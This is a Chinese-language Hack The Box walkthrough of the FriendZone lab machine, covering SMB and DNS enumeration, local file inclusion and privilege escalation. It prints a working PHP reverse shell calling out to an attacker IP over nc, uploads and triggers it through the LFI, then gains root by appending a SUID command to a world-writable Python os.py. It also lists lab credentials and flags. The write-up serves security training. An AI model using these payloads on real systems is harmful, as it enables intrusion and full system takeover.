Hackthebox - FriendZone
靶场信息
靶场类型
信息收集
Nmap
┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -sS -sC -sV -A -p- --min-rate 5000 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 13:14 CST
Nmap scan report for 10.10.10.123
Host is up (0.27s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/9%OT=21%CT=1%CU=36793%PV=Y%DS=2%DC=T%G=Y%TM=631ACC10
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=101%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=
OS:A)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M5
OS:39ST11NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=712
OS:0)ECN(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m54s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-09-09T08:15:47+03:00
| smb2-time:
| date: 2022-09-09T05:15:49
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 277.35 ms 10.10.14.1
2 277.61 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.57 seconds
Http
就一张静态图片,肯定不在这里了
Ftp
┌──(root㉿lucifiel)-[~/Desktop]
└─# ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
本台不允许 ftp 匿名登陆
┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit vsftpd 3.0.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploit-DB 也只找到一个远程DDOS的漏洞,没什么实际意义
Samba
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbmap -H 10.10.10.123
[+] Guest session IP: 10.10.10.123:445 Name: 10.10.10.123
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient --list 10.10.10.123 -U ""
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -p 445 --script=smb-enum-shares 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-20 09:50 CST
Nmap scan report for 10.10.10.123
Host is up (1.2s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 95.19 seconds
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient -N \\\\10.10.10.123\\Development
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 20 09:51:26 2022
.. D 0 Tue Sep 13 22:56:24 2022
3545824 blocks of size 1024. 1658488 blocks available
四大常用指令挨个执行一遍,拿到的信息越多越好
Development 文件夹是空的,看看另一个有读取权限的文件夹
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jan 17 04:10:51 2019
.. D 0 Tue Sep 13 22:56:24 2022
creds.txt N 57 Wed Oct 10 07:52:42 2018
3545824 blocks of size 1024. 1658484 blocks available
这边有一个 creds.txt 文件,读取看一下
creds for the admin THING:
admin:WORKWORKHhallelujah@#
似乎是一个账号密码
漏洞利用
我们回到 Http 页面,会看到有一个邮箱 info@friendzoneportal.red
既然是域名邮箱,那按照常理来说是会存在这个域名的
查看了一下证书,发现确实存在域名,但是是 friendzone.red,去添加一个 hosts 解析
echo 10.10.10.123 friendzone.red >> /etc/hosts
┌──(root㉿lucifiel)-[~/Desktop]
└─# dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.18.1-1-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 1439 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Tue Sep 20 10:09:07 CST 2022
;; XFR size: 8 records (messages 1, bytes 289)
枚举域名信息,发现了三个子域名
administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red
都添加到 hosts
https://administrator1.friendzone.red/ 访问后发现是一个登陆页面
使用我们的账号密码进行登录
登陆成功,让我们访问 /dashboard.php
大概意思是说,这是一个用于朋友圈的智能照片脚本,但是这是一个初级的 php 开发人员写的代码,然后这个脚本还没经过测试,所以有一个参数被遗忘了,输入这个参数可以现实图片,默认是 image_id=a.jpg&pagename=timestamp
看到这参数构成,感觉存在 LFI(本地文件包含),然后在之前的 Development 处,感觉有点不对,一个可读写的地址却没有内容,应该是给我们上传的点。然后我们也知道它的绝对路径,去尝试上传到 Development,再去 LFI 读取试试
\\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f');
?>
把 shell 写入到 php 文件,然后去上传
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient //10.10.10.123/development -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (0.1 kb/s) (average 0.1 kb/s)
然后去包含试试
nc -nvlp 4444
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
┌──(root㉿lucifiel)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 39570
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')";
www-data@FriendZone:/var/www/admin$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功获得 shel
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
a4977797fce2cc139c86af2adc340a29
成功拿到 user 权限的 flag 文件
权限提升
User
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
在登入后的目录找到了一个 mysql_data.conf 文件,里面包含了一些凭证
ww-data@FriendZone:/var/www$ cat /etc/passwd|grep bash
cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
可以看到当前也有这个用户,去尝试 ssh 登陆试试
┌──(root㉿lucifiel)-[~/Desktop]
└─# ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ED25519 key fingerprint is SHA256:ERMyoo9aM0mxdTvIh0kooJS+m3GwJr6Q51AG9/gTYx4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ whoami&&id
friend
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
登入成功
Root
使用 pspy64 跑一下
2022/09/20 05:44:01 CMD: UID=0 PID=1417 | /bin/sh -c /opt/server_admin/reporter.py
2022/09/20 05:44:01 CMD: UID=0 PID=1416 | /bin/sh -c /opt/server_admin/reporter.py
发现有一个脚本 /opt/server_admin/reporter.py 一直在运行
friend@FriendZone:~$ ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
并且还是 root 权限的
friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
我们没有写入权限,但是它会导入一个 os 库,咱们去查看一下是否有权限
friend@FriendZone:/usr/lib/python2.7$ ls -la|grep os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
咱们是有写入权限的,那就写入一段恶意程序就好了
echo "system('chmod +s /bin/bash')" >> os.py
friend@FriendZone:/usr/lib/python2.7$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1113504 Apr 4 2018 /bin/bash
等待两分钟,看到加上 s 权限后,就可以提权了
friend@FriendZone:/usr/lib/python2.7$ /bin/bash -p
bash-4.4# whoami&&id
root
uid=1000(friend) gid=1000(friend) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(friend)
成功提权到 root 权限
bash-4.4# cat /root/root.txt
d93cbc3ed65646042735f3ee312fe2c5
成功拿到 root 权限的 flag 文件